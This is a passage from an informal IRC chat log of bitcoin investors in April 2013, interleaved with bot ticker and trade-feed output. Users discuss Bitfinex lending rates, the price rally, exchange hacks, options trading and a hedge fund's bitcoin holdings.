weighted average of 499.37% Apr 10 14:07:27 almost a million dollars at 500% interest Apr 10 14:07:45 currently lent: Apr 10 14:07:58 743840.76 at 667.165% Apr 10 14:08:30 so, the credit market for margin trading is approx 1.75 million and people pay between 500% and 667%... Apr 10 14:09:11 its on bitfiniex yea? Apr 10 14:09:17 yes Apr 10 14:09:18 I'm thinking price might not move more than +/- 5% today Apr 10 14:09:35 it would be a bitch to move cad to usd Apr 10 14:09:39 to bitfinex Apr 10 14:10:18 yah Apr 10 14:10:29 but this is how i hedge my portfolio Apr 10 14:10:40 dollars lent out at sick interest rates Apr 10 14:10:49 but also... Apr 10 14:10:58 $avg Apr 10 14:11:01 ThickAsThieves: 220.66 Apr 10 14:11:05 6.5408% that is the percent on Bitcoin loans Apr 10 14:11:31 mhm, lending money to them seems like a good idea Apr 10 14:11:38 hell yeah Apr 10 14:11:39 ill do my due diligence tomrrow. Apr 10 14:11:43 its nice so far Apr 10 14:11:56 also...in some ways you are adding liquidity Apr 10 14:12:14 as people can buy and sell more, also enabling short selling which is good, because they HAVE to buy bitcoins at some point Apr 10 14:12:42 500% apr thats like.. a Apr 10 14:12:47 payday loan? Apr 10 14:14:26 yep Apr 10 14:14:30 but they can't actually default Apr 10 14:14:45 what if they get hacked Apr 10 14:14:46 i mean, the only counter party risk is between you and bitfinex Apr 10 14:14:50 yes exactly Apr 10 14:15:01 but you don't have to trust the person actually borrowing the money Apr 10 14:15:25 coz they deposit btc Apr 10 14:15:35 lost 8 coins trying to fish for a top Apr 10 14:15:40 feels bad, never again Apr 10 14:15:46 not only do they have risk procedures in place to autoliquidate the position if they lose their money, but they also guarantee that if they don't catch them in time, they will make up for it Apr 10 14:16:12 seems like a nice compounding game Apr 10 14:16:39 [MPEX] [S.DICE] 195 @ 0.00283546 = 0.5529 BTC [+] Apr 10 14:16:43 [MPEX] [S.DICE] 400 @ 0.0029411 = 1.1764 BTC [+] Apr 10 14:16:46 [MPEX] [S.DICE] 500 @ 0.0029411 = 1.4706 BTC [+] Apr 10 14:16:52 [MPEX] [S.DICE] 500 @ 0.00318999 = 1.595 BTC [+] Apr 10 14:16:54 [MPEX] [S.DICE] 405 @ 0.00319 = 1.292 BTC [+] Apr 10 14:17:33 2k USD to lend eh Apr 10 14:17:35 cheap Apr 10 14:19:56 [BTCTC] [BASIC-MINING] 1 @ 0.38 BTC [-] Apr 10 14:20:36 [BTCTC] [BASIC-MINING] 1 @ 0.374 BTC [-] Apr 10 14:20:44 [BTCTC] [BASIC-MINING] 4 @ 0.37315 = 1.4926 BTC [-] Apr 10 14:20:48 [BTCTC] [BASIC-MINING] 4 @ 0.37311 = 1.4924 BTC [-] Apr 10 14:23:38 what happens when the market moves down too fast for bitfinex to autoliquidate the margined longs? Apr 10 14:23:42 [MPEX] [S.DICE] 500 @ 0.00318999 = 1.595 BTC [-] Apr 10 14:23:44 [MPEX] [S.DICE] 400 @ 0.00319 = 1.276 BTC [+] Apr 10 14:23:51 [BTCTC] [GSDPT] 60 @ 0.00256 = 0.1536 BTC [-] Apr 10 14:24:06 they could end up getting really fucked really quickly... Apr 10 14:24:07 [BTCTC] [GSDPT] 1000 @ 0.0025 = 2.5 BTC [-] Apr 10 14:24:21 then what? Apr 10 14:24:47 they don't disclose how much of a cushion they have to protect against that... Apr 10 14:25:10 lol does this mean its just gonna keep going up bid $248.53 ask $249.40 there's practically no spread Apr 10 14:25:16 300 dollars reached on china Apr 10 14:25:16 yea Apr 10 14:25:19 in china Apr 10 14:25:21 fuck my grammar Apr 10 14:25:23 mtgox is way too fucking laggy Apr 10 14:25:27 an exchange in china? Apr 10 14:25:29 300 bucks in china Apr 10 14:25:29 to be running something like bitfinex on top of it Apr 10 14:25:31 yeap Apr 10 14:25:55 i think i'll write an open source exchange Apr 10 14:25:56 [MPEX] [S.MPOE] 1517 @ 0.000715 = 1.0847 BTC [+] Apr 10 14:26:02 or make the one i have os... Apr 10 14:26:12 tired of crappy exchanges Apr 10 14:26:14 ;;ticker Apr 10 14:26:15 BTCUSD ticker | Best bid: 249.78598, Best ask: 249.78600, Bid-ask spread: 0.00002, Last trade: 249.78598, 24 hour volume: 100347.88063017, 24 hour low: 199.78000, 24 hour high: 250.50000, 24 hour vwap: 228.10415 Apr 10 14:34:07 Selling Call Options for lower than mpex bot, available in 86, 95, 104, 128, 131, 134 Apr 10 14:34:18 they are listed on mpex/coinbr Apr 10 14:34:24 no need to pm Apr 10 14:35:31 Max Keiser .@maxkeiser 3h Apr 10 14:35:32 As I predicted: BTC would hit $250 (+/- 1%) and then pull back (as we've seen to $211). This is very healthy bull market action. Apr 10 14:35:39 there was no pullback to 211 Apr 10 14:36:10 ;;ticker Apr 10 14:36:10 BTCUSD ticker | Best bid: 250.78500, Best ask: 250.80000, Bid-ask spread: 0.01500, Last trade: 250.80000, 24 hour volume: 99766.58677138, 24 hour low: 201.56584, 24 hour high: 250.80000, 24 hour vwap: 228.36193 Apr 10 14:36:15 look again Apr 10 14:36:45 it blew through 211 and never came back Apr 10 14:37:24 maybe he's looking at something else Apr 10 14:37:44 I didn't know he was promoting bitcoins like this Apr 10 14:37:58 he is quite active indeed Apr 10 14:39:23 he is seeing what he wants to see or the drop to 211 is upcoming.. Apr 10 14:39:33 when did it go to 211 Apr 10 14:39:50 well it didnt' that's why i'm wondering Apr 10 14:39:59 was that maxkeiser? Apr 10 14:40:04 https://twitter.com/maxkeiser Apr 10 14:40:05 yes Apr 10 14:40:06 maybe he was watching a different exchnage? Apr 10 14:40:14 he is an idiot...but i kinda appreciate him Apr 10 14:40:22 he says the most random crazy shit on his show Apr 10 14:40:28 he was watching exante.eu Apr 10 14:40:43 [MPEX] [S.MPOE] 6572 @ 0.00070202 = 4.6137 BTC [-] Apr 10 14:40:51 and i think half the comments reference meth Apr 10 14:41:11 wonder what price they offer? supposedly lots of 1k Btc Apr 10 14:44:45 yeah crazy right Apr 10 14:45:05 where do they get access to the bitcoins? gox? Apr 10 14:45:15 #bitcoin is almost the top channel on freenode Apr 10 14:45:17 wouldn't be surprised if others like them are a big part of the rally Apr 10 14:45:26 like who? Apr 10 14:45:30 exante Apr 10 14:45:31 maybe gox giving them lag discount... Apr 10 14:45:40 the malta based hedge fund Apr 10 14:45:48 and i use the term loosely...they just buy bitcoins Apr 10 14:45:50 http://images.4chan.org/pol/src/1365587607741.png Apr 10 14:45:55 they have 81K Bitcoins Apr 10 14:46:21 and if someone wants to redeem 1000 fund units Apr 10 14:46:29 do they cover it directly or offload to the markets Apr 10 14:47:02 lol... 1 billion lined up Apr 10 14:47:12 100 more USD/BTC injection? Apr 10 14:47:20 pff... how small... Apr 10 14:47:36 1billion will make the price go up more than 100 Apr 10 14:48:19 curr marketcap is like 200m? Apr 10 14:48:48 1b/6m coins +$500~ Apr 10 14:49:07 wait, no $200 Apr 10 14:49:10 bitesak: true, because most coins in existence are probably lost... Apr 10 14:49:26 and are not available for sale also Apr 10 14:49:45 Many early day miners probably destroyed their wallets of "worthless bitcoins". Apr 10 14:49:50 Then there's horders Apr 10 14:49:52 yes max, i will mine Apr 10 14:50:02 and people not there to sell their Bitcoins... Apr 10 14:50:09 exante will pay dearly for my coins Apr 10 14:52:53 price > $500 if they actually buy coins. Apr 10 14:54:00 [HAVELOCK] [VTX] 2 @ 0.19500001 = 0.39 BTC [-] Apr 10 14:59:40 [MPEX] [S.MPOE] 2200 @ 0.0006992 = 1.5382 BTC [-] Apr 10 15:01:30 ;;asks 500 Apr 10 15:01:30 There are currently 20002.321 bitcoins offered at or under 500.0 USD, worth 6885874.93277 USD in total. | Data vintage: 33.2068 seconds Apr 10 15:01:55 !help Apr 10 15:01:55 List of commands: Apr 10 15:01:56 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Apr 10 15:01:57 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Apr 10 15:01:58 !mp (desc: returns the response from MPEX order) Apr 10 15:01:59 !rules (desc: chan guidelines) {short: !r} Apr 10 15:02:00 !exchanges (desc: lists exchanges and brokers) {short: !e} Apr 10 15:02:29 ;;buys 1000000000 Apr 10 15:02:30 Error: "buys" is not a valid command. Apr 10 15:03:32 whats that command with $ amount and number of coins you could buy? Apr 10 15:06:37 ;;market buy 1000000000 Apr 10 15:06:37 This order would exceed the size of the order book. You would buy 36730.056 bitcoins, for a total of 27477039122996.8594 USD and take the price to 13370133701337.0000. | Data vintage: 19.7813 seconds Apr 10 15:07:26 (note thats about 50 times more bitcoins than will ever exist) Apr 10 15:07:54 1billion USD not BTC Apr 10 15:09:19 [BTCTC] [GSDPT] 1 @ 0.00242 BTC [-] Apr 10 15:09:37 [BTCTC] [GSDPT] 1 @ 0.00242 BTC [-] Apr 10 15:09:40 [BTCTC] [GSDPT] 318 @ 0.00241 = 0.7664 BTC [-] Apr 10 15:10:46 [MPEX] [S.DICE] 318 @ 0.00293588 = 0.9336 BTC [-] Apr 10 15:10:56 apparently, exante has 81k bitcoins...giving them AUM of 20.25 million dollars Apr 10 15:12:24 not abd Apr 10 15:12:27 bad* Apr 10 15:13:26 return over last 3 months...1000% Apr 10 15:13:28 lol Apr 10 15:13:43 minimum to open account 100k euro Apr 10 15:14:00 lol... Apr 10 15:14:11 I hope not too many fools bite... or do I? Apr 10 15:14:21 I would be able to sell BTC even higher Apr 10 15:14:43 i'm looking to buy ;) Apr 10 15:15:34 1 million a BTC please. Thank you, sir. Apr 10 15:16:01 coinlab. What a bunch of tools Apr 10 15:16:11 Hello, I'm writing with an update regarding the Mt. Gox transition we announced a month ago. We've made good progress fulfilling direct buy and sell orders, and that seems to be going great. Our customers are saying really nice things about our customer service, and we've enjoyed making some direct connections with you. Apr 10 15:16:11 a no shit Apr 10 15:16:22 We will continue to make progress, but we're waiting for two things to be implemented: Full customer data access Working wire and Dwolla withdrawal forms Once those are done, we'll be ready to go. Apr 10 15:16:23 LMAO Apr 10 15:16:44 Our customers are saying really nice things about our customer service! Apr 10 15:16:45 Because of the Gox team's strong customer data protection methodologies, we aren't allowed to deliver these things directly, they have to go through the Gox process and that's taking longer than any of us want. I will be in Tokyo next week, and should have more updates then. Apr 10 15:16:53 WHAT CUSTOMERS? Apr 10 15:16:55 aka we suck dicks well Apr 10 15:17:05 you can't have customer service without customers. Apr 10 15:17:34 Just got that email Apr 10 15:19:24 $avg Apr 10 15:19:25 deadweasel: 227.18 Apr 10 15:20:24 lol, CoinLab PR is worse than Gox's Apr 10 15:20:33 260 Apr 10 15:20:58 people like us, no really! Apr 10 15:23:30 i have some C188s, if this trend continues it is best to let them auto-exercise? if trend turns down i should exercise them before expiration? Apr 10 15:23:43 or is it better to sell to bot rather than exercise? Apr 10 15:24:03 apparently, selling to bot is better Apr 10 15:24:11 me too I have some 188 :) Apr 10 15:24:42 shortest answer is, it depends Apr 10 15:25:03 run the math, check which method works best at the time you are ready Apr 10 15:25:30 but last month, I had trouble selling mine and it was easier just to press on exercise in coinbr Apr 10 15:25:37 not da maffs! Apr 10 15:26:15 almost always better to sell to the bot Apr 10 15:26:32 but better do the math, cause da bot can be pricing things incorrectly Apr 10 15:26:36 at times Apr 10 15:27:06 ok. thx y'all. i do maffs tonight after work! Apr 10 15:27:27 if the trend continues, yes, you should hold as long as you can. Apr 10 15:27:55 $avg Apr 10 15:27:55 this is not a sustainable rally today... not enough bid support Apr 10 15:27:56 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 15:28:06 I agree Apr 10 15:28:09 it will deflate Apr 10 15:28:25 unless we are reaching a new angle in the curve... Apr 10 15:28:53 265 Apr 10 15:29:01 260 Apr 10 15:29:02 hehe Apr 10 15:29:24 but but the avg will climb until price ;;ticker Apr 10 15:29:46 BTCUSD ticker | Best bid: 265.00000, Best ask: 265.50000, Bid-ask spread: 0.50000, Last trade: 265.50000, 24 hour volume: 98543.24485812, 24 hour low: 204.00100, 24 hour high: 265.00000, 24 hour vwap: 230.36571 Apr 10 15:33:42 deadweasel: it will probably climb even longer than that Apr 10 15:33:51 depending on volume etc Apr 10 15:37:32 but not more than say, 12 hours once the price turns down? Apr 10 15:38:22 24hr hr avg would have to stare falling onve price is less than avg... right. Apr 10 15:38:25 ? Apr 10 15:39:32 no Apr 10 15:40:47 24hr ave falls when the volume weighted price of the current time is less than the volume weighted price of what is rolling off the end of the 24hour window. This is rarely the same point of when the overall 24hr average > current spot price. Apr 10 15:42:19 Better go spread some stuff to prop up my vested interests in Bitcoins... Apr 10 15:45:41 [BTCTC] [ASICMINER-PT] 1 @ 0.755 BTC [-] Apr 10 15:45:55 ;;bc,24hprc Apr 10 15:45:56 Error: Failed to retrieve data. Try again later. Apr 10 15:46:06 ;;ticker Apr 10 15:46:07 BTCUSD ticker | Best bid: 264.99000, Best ask: 265.40000, Bid-ask spread: 0.41000, Last trade: 264.99000, 24 hour volume: 96781.06266826, 24 hour low: 205.00000, 24 hour high: 266.00000, 24 hour vwap: 231.21792 Apr 10 15:46:25 $avg Apr 10 15:46:27 deadweasel: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 15:48:35 ;;goxlag Apr 10 15:48:35 MtGox lag is 3.442951 seconds. During this time, light travels 0.0068996352548 AU. You could have sent a bitcoin from Jupiter to its largest moon, Ganymede (0.007155 AU). Apr 10 15:48:39 $avg Apr 10 15:48:40 deadweasel: 227.18 Apr 10 15:49:08 mwuahahahaha Apr 10 15:49:16 so 24hr vwap is the leading number for the avg... Apr 10 15:49:25 the avg calc anyway Apr 10 15:51:10 so it takes all spot vwaps for 24 hrs and averages them into $avg. Apr 10 15:54:46 ;;goxlag Apr 10 15:54:46 MtGox lag is 114.26117 seconds. During this time, light travels 0.228978105348 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 10 15:57:18 [MPEX] [S.MPOE] 4428 @ 0.0006992 = 3.0961 BTC [-] Apr 10 15:57:51 24 hour volume from gribble is 24h volume MtGox ? Apr 10 15:58:04 is there a resource out there with historical 24h averages? Apr 10 16:00:49 2hr vwap is 24 hr volume weighted average across all exchanges/ Apr 10 16:00:58 at that moment. Apr 10 16:01:31 of course... I want to know if there is a historical record of those values anywhere? Apr 10 16:01:49 at least for midnight GMT Apr 10 16:02:21 i want to know also. just telling error4733 Apr 10 16:02:24 ;;bc,24hprc Apr 10 16:02:25 227.18 Apr 10 16:02:27 i might possibly have something, lemme see Apr 10 16:02:31 hehe Apr 10 16:02:42 ah Apr 10 16:02:59 ;;ticker Apr 10 16:03:00 BTCUSD ticker | Best bid: 258.00001, Best ask: 259.00000, Bid-ask spread: 0.99999, Last trade: 259.00000, 24 hour volume: 96828.50560386, 24 hour low: 205.00000, 24 hour high: 266.00000, 24 hour vwap: 231.94314 Apr 10 16:05:02 accually i dont keep the vwap in the db only derivates of it since 26.5.2011 Apr 10 16:05:36 but you can get whole history from bitcoincharts or whatever Apr 10 16:05:43 and recalc Apr 10 16:10:26 thanks Apr 10 16:12:12 [BTCTC] [BTC-BOND] 200 @ 0.00997 = 1.994 BTC [-] Apr 10 16:12:18 [BTCTC] [BTC-BOND] 250 @ 0.009961 = 2.4903 BTC [-] Apr 10 16:12:25 [BTCTC] [BTC-BOND] 200 @ 0.00996 = 1.992 BTC [-] Apr 10 16:15:31 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Apr 10 16:20:51 Wow a call bought yesterday is itm today...this is fishy Apr 10 16:21:43 thestringpuller: the weighted average price too? Apr 10 16:23:41 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Apr 10 16:24:07 [BTCTC] [S.DICE-PT] 5 @ 0.00325 = 0.0163 BTC [-] Apr 10 16:24:23 [BTCTC] [BASIC-MINING] 1 @ 0.374 BTC [+] Apr 10 16:24:40 [BTCTC] [BASIC-MINING] 1 @ 0.372 BTC [-] Apr 10 16:25:04 [BTCTC] [BASIC-MINING] 3 @ 0.37103 = 1.1131 BTC [-] Apr 10 16:25:32 ;;ticker Apr 10 16:25:33 BTCUSD ticker | Best bid: 258.52000, Best ask: 259.00000, Bid-ask spread: 0.48000, Last trade: 259.00000, 24 hour volume: 98201.05349287, 24 hour low: 205.20000, 24 hour high: 266.00000, 24 hour vwap: 233.21993 Apr 10 16:25:37 thestringpuller: not only is it fishy... it's unreal... Apr 10 16:25:44 bitesak: yea the 24hprc Apr 10 16:25:53 the margin asked on those calls is massive... Apr 10 16:26:28 [BTCTC] [B.YABMC] 1 @ 0.01199 BTC [+] Apr 10 16:26:31 [BTCTC] [B.YABMC] 1 @ 0.012 BTC [+] Apr 10 16:26:31 Namworld: very surreal, is this what happens when a lot of money enters a market, or will come April 29th, MPOE-Bot will have lost much Apr 10 16:26:32 i followed bugpowder analysis and bought 188 at the beginning of the month. Seemed risky back then :) Apr 10 16:26:35 [BTCTC] [B.YABMC] 1 @ 0.012 BTC [+] Apr 10 16:26:38 dont cry shitwolf Apr 10 16:26:39 ;;ticker Apr 10 16:26:40 BTCUSD ticker | Best bid: 255.00000, Best ask: 258.99000, Bid-ask spread: 3.99000, Last trade: 255.00000, 24 hour volume: 98201.05349287, 24 hour low: 205.20000, 24 hour high: 266.00000, 24 hour vwap: 233.21993 Apr 10 16:27:02 tailer park boys <3 Apr 10 16:28:21 Nice bullflag Apr 10 16:29:13 I'll see this as weakness if it even touches 250 Apr 10 16:29:43 [BTCTC] [ASICMINER-PT] 1 @ 0.774 BTC [+] Apr 10 16:34:59 is taub canadian? Apr 10 16:36:59 [HAVELOCK] [VTX] 2 @ 0.2 = 0.4 BTC [+] Apr 10 16:37:01 [HAVELOCK] [VTX] 10 @ 0.21 = 2.1 BTC [+] Apr 10 16:40:59 [HAVELOCK] [HIM] 2 @ 1.1 = 2.2 BTC [-] Apr 10 16:44:42 !ticker h him Apr 10 16:44:43 [HAVELOCK:HIM] 1D: 1.10000000 / 1.29951327 / 1.70000000 (113 shares, 146.84500001 BTC), 7D: 1.10000000 / 1.56626019 / 1.93000000 (216 shares, 338.31220010 BTC), 30D: 1.10000000 / 1.78251174 / 2.08000000 (792 shares, 1411.74929840 BTC) Apr 10 16:46:45 ;;ticker Apr 10 16:46:48 BTCUSD ticker | Best bid: 254.00000, Best ask: 254.99490, Bid-ask spread: 0.99490, Last trade: 254.00000, 24 hour volume: 99132.93124795, 24 hour low: 207.56630, 24 hour high: 266.00000, 24 hour vwap: 233.77794 Apr 10 16:50:08 ;;later --tell mircea_popescu: https://twitter.com/maxkeiser/status/321897445422399488 - Gangsta? Apr 10 16:50:08 The operation succeeded. Apr 10 16:53:04 ;;bc,24hprc Apr 10 16:53:04 Error: Failed to retrieve data. Try again later. Apr 10 16:53:15 $avg Apr 10 16:53:19 taub: 227.18 Apr 10 17:00:42 ;;bc,24hprc Apr 10 17:00:43 Error: Failed to retrieve data. Try again later. Apr 10 17:00:45 $avg Apr 10 17:00:47 ;;ticker Apr 10 17:00:47 thestringpuller: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 17:00:48 BTCUSD ticker | Best bid: 244.00000, Best ask: 246.00000, Bid-ask spread: 2.00000, Last trade: 246.00000, 24 hour volume: 98467.48651505, 24 hour low: 208.01000, 24 hour high: 266.00000, 24 hour vwap: 234.66446 Apr 10 17:00:54 Come on bross Apr 10 17:02:52 [BTCTC] [S.DICE-PT] 1 @ 0.004 BTC [+] Apr 10 17:09:17 ;;later --help Apr 10 17:09:17 Error: The "Later" plugin is loaded, but there is no command named "--help" in it. Try "list Later" to see the commands in the "Later" plugin. Apr 10 17:09:25 ;;list later Apr 10 17:09:25 notes, remove, and tell Apr 10 17:09:34 i love gribble Apr 10 17:12:16 ;;later tell mircea_popescu http://www.quickmeme.com/meme/3tsbo3/ Apr 10 17:12:16 The operation succeeded. Apr 10 17:19:00 ;;goxlag Apr 10 17:19:04 MtGox lag is 554.95413 seconds. During this time, light travels 1.11212186294 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 17:20:11 ;;goxlag Apr 10 17:20:12 MtGox lag is 586.52823 seconds. During this time, light travels 1.17539600582 AU. You could have sent a bitcoin from the Sun to Earth (1 AU). Apr 10 17:21:28 incoming GLBSE div Apr 10 17:21:28 er Apr 10 17:21:36 incoming ASICMINER div Apr 10 17:21:38 why wait for gox, when you can visit the sun Apr 10 17:22:06 ;;ticker Apr 10 17:22:08 BTCUSD ticker | Best bid: 245.10000, Best ask: 248.00000, Bid-ask spread: 2.90000, Last trade: 250.00000, 24 hour volume: 97594.28627093, 24 hour low: 213.00000, 24 hour high: 266.00000, 24 hour vwap: 235.22490 Apr 10 17:23:15 can anyone get to gox? Apr 10 17:23:59 [HAVELOCK] [SDICE] 1 @ 0.27 BTC [-] Apr 10 17:25:05 bugpowder, yes Apr 10 17:26:06 ;;bc,24hprc Apr 10 17:26:07 Error: Failed to retrieve data. Try again later. Apr 10 17:26:13 ;;ticker Apr 10 17:26:14 BTCUSD ticker | Best bid: 249.99897, Best ask: 249.99996, Bid-ask spread: 0.00099, Last trade: 249.99897, 24 hour volume: 97477.12202574, 24 hour low: 213.00000, 24 hour high: 266.00000, 24 hour vwap: 235.69527 Apr 10 17:27:04 https://docs.google.com/viewer?a=v&pid=gmail&attid=0.1&thid=13df4482057b77fd&mt=application/pdf&url=http://mail.google.com/mail/u/0/?ui%3D2%26ik%3D1f86642556%26view%3Datt%26th%3D13df4482057b77fd%26attid%3D0.1%26disp%3Dsafe%26zw&sig=AHIEtbQVm6lPWHiUH0um9oxaFZF_KoRCog Apr 10 17:28:05 [BTCTC] [COGNITIVE] 1 @ 0.12799 BTC [+] Apr 10 17:28:10 deadweasel: doesn't seem publi link Apr 10 17:28:33 back to 260 Apr 10 17:28:37 [BTCTC] [ASICMINER-PT] 1 @ 0.774 BTC [+] Apr 10 17:28:38 anyone get worried there? Apr 10 17:28:43 [BTCTC] [ASICMINER-PT] 1 @ 0.77489 BTC [+] Apr 10 17:28:47 [BTCTC] [ASICMINER-PT] 2 @ 0.7749 = 1.5498 BTC [+] Apr 10 17:28:50 [BTCTC] [ASICMINER-PT] 4 @ 0.775 = 3.1 BTC [+] Apr 10 17:29:15 [BTCTC] [COGNITIVE] 2 @ 0.128 = 0.256 BTC [+] Apr 10 17:29:22 lol Apr 10 17:30:11 Bugpowdurr: the bears are doing their job Apr 10 17:30:17 Bugpowdurr: did smickles get back to you? Apr 10 17:30:18 we'll get back to 260, just need more time Apr 10 17:30:21 ;;seen smickles Apr 10 17:30:21 smickles was last seen in #bitcoin-assets 5 days, 22 hours, 47 minutes, and 50 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 10 17:30:30 people are buying too aggresively Apr 10 17:30:45 ThickAsThieves: yes so bears will come in an dump on them Apr 10 17:30:53 pigs get slaughtered Apr 10 17:31:59 [HAVELOCK] [HIM] 2 @ 1.1 = 2.2 BTC [-] Apr 10 17:32:58 [BTCTC] [S.MPOE-PT] 100 @ 0.000689 = 0.0689 BTC [+] Apr 10 17:36:43 What exactly does this group discuss? I am new to this but find it extremely interesting Apr 10 17:37:16 anything to do with investing in the bitcoin world Apr 10 17:37:47 idk but I sold like 40 BTC at 130 and 50 at 250 Apr 10 17:38:01 will probably keep selling small chunks as we keep rising Apr 10 17:38:56 So, what are the main ideas for investing in bitcoins so far? Would anyone be interested in setting up various basic financial instruments (e.g. annuities, bonds, etc) and have ideas on how to implement it? I am not a programmer but am a finance/economics expert Apr 10 17:40:04 There's already a lot of options out there... Apr 10 17:40:23 http://www.ebay.com/itm/Bitcoin-T-Shirt-Benjamins-Cant-Buy-This-/170978275197?pt=Coins_US_Individual&hash=item27cf196f7d Apr 10 17:40:36 ^ irony Apr 10 17:41:20 hahah nice. What exactly do you mean by options? Apr 10 17:41:22 jdeurlruyk check the few links on the right on http://bitcoin-assets.com to begin with Apr 10 17:41:41 ;;ticker Apr 10 17:41:42 BTCUSD ticker | Best bid: 258.00000, Best ask: 258.49000, Bid-ask spread: 0.49000, Last trade: 258.49000, 24 hour volume: 97414.58644216, 24 hour low: 213.00000, 24 hour high: 266.00000, 24 hour vwap: 236.13664 Apr 10 17:41:42 options, bonds, stocks of bitcoin ventures, etc. Apr 10 17:41:56 There's plenty to be found around already. Apr 10 17:42:10 https://coinbr.com/ref?c=294TNRz1oP you can sign up here and start trading stocks, options. Apr 10 17:42:21 fee is .07 btc per mo. Apr 10 17:42:30 That's an MPEx broker tho... Apr 10 17:42:42 The actual exchange has a 30 BTC flat fee to join... Apr 10 17:42:52 fee is .09 per month for coinbr, no? Apr 10 17:43:25 yeah it is, sorry! Apr 10 17:43:44 MPEx never hacked? awesome Apr 10 17:44:20 pretty sure most of the current exchanges havent been hacked yet Apr 10 17:44:52 mpex just has the biggest balls ;) Apr 10 17:45:44 fuckin net Apr 10 17:45:49 thowing me off Apr 10 17:45:57 ThickAsThieves wrong Apr 10 17:46:14 some have been hacked? Apr 10 17:46:29 like BitFunder, BTCT, Havelock? Apr 10 17:46:47 but they exists for a month or three Apr 10 17:46:53 doesnt make me wrong Apr 10 17:47:02 most of the exchanges so far were hacked Apr 10 17:47:16 most of the current one including fiat were Apr 10 17:47:21 There have definitely been hacks and problems Apr 10 17:47:38 but much faster to fix than every other bank or central fed Apr 10 17:47:42 i was referring to the ones we were discussing Apr 10 17:47:46 not gox and dead ones Apr 10 17:47:49 etc Apr 10 17:47:56 nor fiat ones Apr 10 17:48:00 but yes Apr 10 17:48:04 actually any hack is worse when it's done in btc Apr 10 17:48:10 fiat dealers get hacked Apr 10 17:48:13 a hacked bank can roll back the transactions Apr 10 17:48:21 in btc the money is gone Apr 10 17:48:41 indeed... Apr 10 17:48:51 a BTC hack can often doom the business and all customers... Apr 10 17:49:08 even a btc bug can do that Apr 10 17:49:16 yes cause you cant just type the numbers back in Apr 10 17:49:16 like the bankers do Apr 10 17:49:18 thats what we get for not being backed by anything physical, though Apr 10 17:49:24 fee is .09 per month for coinbr, no? <<< He dropped it to .045 Apr 10 17:49:34 nice, Apr 10 17:49:34 [MPEX] [S.MPOE] 32809 @ 0.00071359 = 23.4122 BTC [+] Apr 10 17:49:36 [MPEX] [S.MPOE] 28300 @ 0.00071123 = 20.1278 BTC [-] Apr 10 17:49:41 he should update his About page then Apr 10 17:49:44 and if the business owners faked the hack, it's pretty much indistinguishable... Apr 10 17:49:57 technically... Apr 10 17:50:06 only know because I see it on my recent transactions page. Apr 10 17:50:14 everything is very obfuscable Apr 10 17:50:18 um Apr 10 17:50:19 good point Apr 10 17:50:22 oh i think he charged less this month Apr 10 17:50:25 because of down time Apr 10 17:50:26 when I want buy asicminer-pt shares, how to do it? Apr 10 17:50:32 ah, maybe. Apr 10 17:52:26 wao, you make an account on Bitfunder or BTCT Apr 10 17:52:28 and buy them Apr 10 17:54:23 Thanks for the help! I have to go back to work *shrug* but I will be back because this is too interesting not to write an econ paper on a few things Apr 10 17:55:12 Would people be interested in participating in brief interviews on the topic? Apr 10 17:55:41 obvi no names are attached, just to pick your brains on ideas Apr 10 17:55:45 Why not Apr 10 17:56:08 well just ask Apr 10 17:57:03 a discussion for another day for now i gotta make sure i can pay rent Apr 10 17:58:42 dayjob call Apr 10 18:02:37 16:58.09 ( Enky ) http://www.zerohedge.com/news/2013-04-10/bitcoin-parabola-not-enough-here-comes-bitcoin-opportunity-fund-time-leverage Apr 10 18:13:23 good good Apr 10 18:16:13 AM divs Apr 10 18:16:15 [MPEX] [S.MPOE] 2365 @ 0.00070215 = 1.6606 BTC [-] Apr 10 18:16:54 0.00695 Apr 10 18:17:34 not bad. Apr 10 18:17:39 or is it? Apr 10 18:18:48 its a lot more than expected Apr 10 18:19:05 supposed to be a low div week too afaik Apr 10 18:19:18 last was .0025 and he said this would be lower Apr 10 18:22:20 [BTCTC] [ASICMINER-PT] 1 @ 0.751 BTC [-] Apr 10 18:22:23 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Apr 10 18:22:41 50K USD as reserves :) Apr 10 18:24:59 [HAVELOCK] [VTX] 2 @ 0.2390001 = 0.478 BTC [+] Apr 10 18:25:00 [HAVELOCK] [VTX] 5 @ 0.24 = 1.2 BTC [+] Apr 10 18:33:00 https://exante.eu/press/news/266/ Apr 10 18:33:03 keiser tweeted Apr 10 18:33:50 timeline Apr 10 18:39:54 thank you asicminer Apr 10 18:40:04 just to top off a beautiful day Apr 10 18:41:45 $avg Apr 10 18:41:46 deadweasel: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 10 18:41:58 [HAVELOCK] [VTX] 3 @ 0.22 = 0.66 BTC [-] Apr 10 18:43:59 [HAVELOCK] [SDICE] 10 @ 0.241 = 2.41 BTC [-] Apr 10 18:44:49 ;;bc,24hprc Apr 10 18:45:00 Error: Failed to retrieve data. Try again later. Apr 10 18:46:18 [MPEX] [S.DICE] 1000 @ 0.00293588 = 2.9359 BTC [-] Apr 10 18:46:19 ;;ticker Apr 10 18:46:20 BTCUSD ticker | Best bid: 239.62588, Best ask: 240.00000, Bid-ask spread: 0.37412, Last trade: 240.00000, 24 hour volume: 94220.60089513, 24 hour low: 218.52000, 24 hour high: 266.00000, 24 hour vwap: 238.58516 Apr 10 18:46:27 $avg Apr 10 18:46:30 deadweasel: 227.18 Apr 10 18:46:58 do that does change throughout the day? or changes on tick of midnight? Apr 10 18:47:04 do / so Apr 10 18:47:19 changes regularly Apr 10 18:47:53 I'm selling call options for lower than mpex bot, available in 86, 95, 104, 128, 131, 134. No need to pm, they are listed on mpex Apr 10 18:47:54 been the same all day today.. Apr 10 18:49:47 [BTCTC] [GSDPT] 1 @ 0.00243 BTC [+] Apr 10 18:50:20 ;;goxlag Apr 10 18:50:20 MtGox lag is 836.410295 seconds. During this time, light travels 1.67615686626 AU. You 